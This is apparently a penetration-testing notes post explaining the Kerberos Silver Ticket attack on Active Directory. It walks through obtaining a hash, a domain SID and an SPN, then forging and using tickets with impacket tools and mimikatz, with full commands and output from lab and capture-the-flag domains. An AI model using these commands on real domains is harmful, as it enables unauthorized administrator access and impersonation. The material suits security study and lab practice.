Silver Ticket Attack
Post

Silver Ticket Attack

Ticketer

To generate a Silver ticket we need 3 resources:

  • NTLM Hash
  • DC SID
  • SPN

Getting NTLM Hash

To create a silver ticket, we use the password hash and not the cleartext password. If a kerberoast session presented us with the cleartext password, we must hash it before using it to generate a silver ticket.

If we don’t have the NTLM Hash but we have the password we can generate the hash with this tool: NTLM Hash Generator Getting-NTLM-Hash

Extracting DC SID

To create the ticket, we first need the obtain the so-called Security Identifier or SID of the domain. A SID is an unique name for any object in Active Directory and has the following structure:

1
S-1-5-21-2536614405-3629634762-1218571035-1116

Within this structure, the SID begins with a literal “S” to identify the string as a SID, followed by a revision level (usually set to “1”), an identifier-authority value (often “5” within AD) and one or more subauthority values.

We can use the following command:

1
impacket-getPac scrm.local/ksimpson:ksimpson -targetUser Administrator

Also if we compromised a machine already we can easily obtain the SID of our current user with the whoami /user command and then extract the domain SID part from it. Let’s try to do this on our Windows 10 client:

1
2
3
4
5
6
7
8
C:\>whoami /user

USER INFORMATION
----------------

User Name   SID
=========== ==============================================
corp\offsec S-1-5-21-1602875587-2787523311-2599479668-1103

Getting the SPN

(-k option is needed only if NTLM authentication is disabled)

1
impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -k -dc-ip dc1.scrm.local

Generating the Silver Ticket:

impacket-ticketer

We can craft a ticket as follows:

1
impacket-ticketer -spn MSSQLSvc/dc1.scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -dc-ip dc1.scrm.local Administrator -domain scrm.local

Examples: Intelligence

impacket-getST

Another option is to craft it with this impacket tool:

1
sudo impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :fca9edf1c9fb8f031dfc38d918279642

Examples: Intelligence

Using ticket with any impacket utility

impacket-mssqlclient

We can export the Administrator.ccache file generated so we can use it with any impacket utility:

1
export KRB5CCNAME=Administrator.ccache

As shown below:

1
2
3
4
5
6
7
8
9
10
11
12
impacket-mssqlclient dc1.scrm.local -k
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL>

Examples: [[Scramble#^ac1e1e]]

impacket-wmiexec

Then we can execute the impacket-wmiexec to access the machine:

1
2
3
4
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec -k -no-pass dc.intelligence.htb
C:\>whoami
intelligence\administrator

Resources: SilverTicket Explanation S4vitar Minuto 1:20:00: Silver-Ticket-Attack

Mimikatz

An additional option is to load the silver ticket to memory with mimikatz as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz # kerberos::list

mimikatz # kerberos::golden /user:offsec /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:E2B475C11DA2A0748290D87AA966C327 /ptt
User      : offsec
Domain    : corp.com (CORP)
SID       : S-1-5-21-1602875587-2787523311-2599479668
User Id   : 500
Groups Id : \*513 512 520 518 519
ServiceKey: e2b475c11da2a0748290d87aa966c327 - rc4_hmac_nt
Service   : HTTP
Target    : CorpWebServer.corp.com
Lifetime  : 13/02/2018 10.18.42 ; 11/02/2028 10.18.42 ; 11/02/2028 10.18.42
-> Ticket : \*\* Pass The Ticket \*\*

 \* PAC generated
 \* PAC signed
 \* EncTicketPart generated
 \* EncTicketPart encrypted
 \* KrbCred generated

Golden ticket for 'offsec @ corp.com' successfully submitted for current session

mimikatz # kerberos::list

[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 13/02/2018 10.18.42 ; 11/02/2028 10.18.42 ; 11/02/2028 10.18.42
   Server Name       : HTTP/CorpWebServer.corp.com @ corp.com
   Client Name       : offsec @ corp.com
   Flags 40a00000    : pre_authent ; renewable ; forwardable ;

Now that we have this ticket loaded into memory, we can interact with the service and gain access to any information based on the group memberships we put in the silver ticket. Depending on the type of service, it might also be possible to obtain code execution.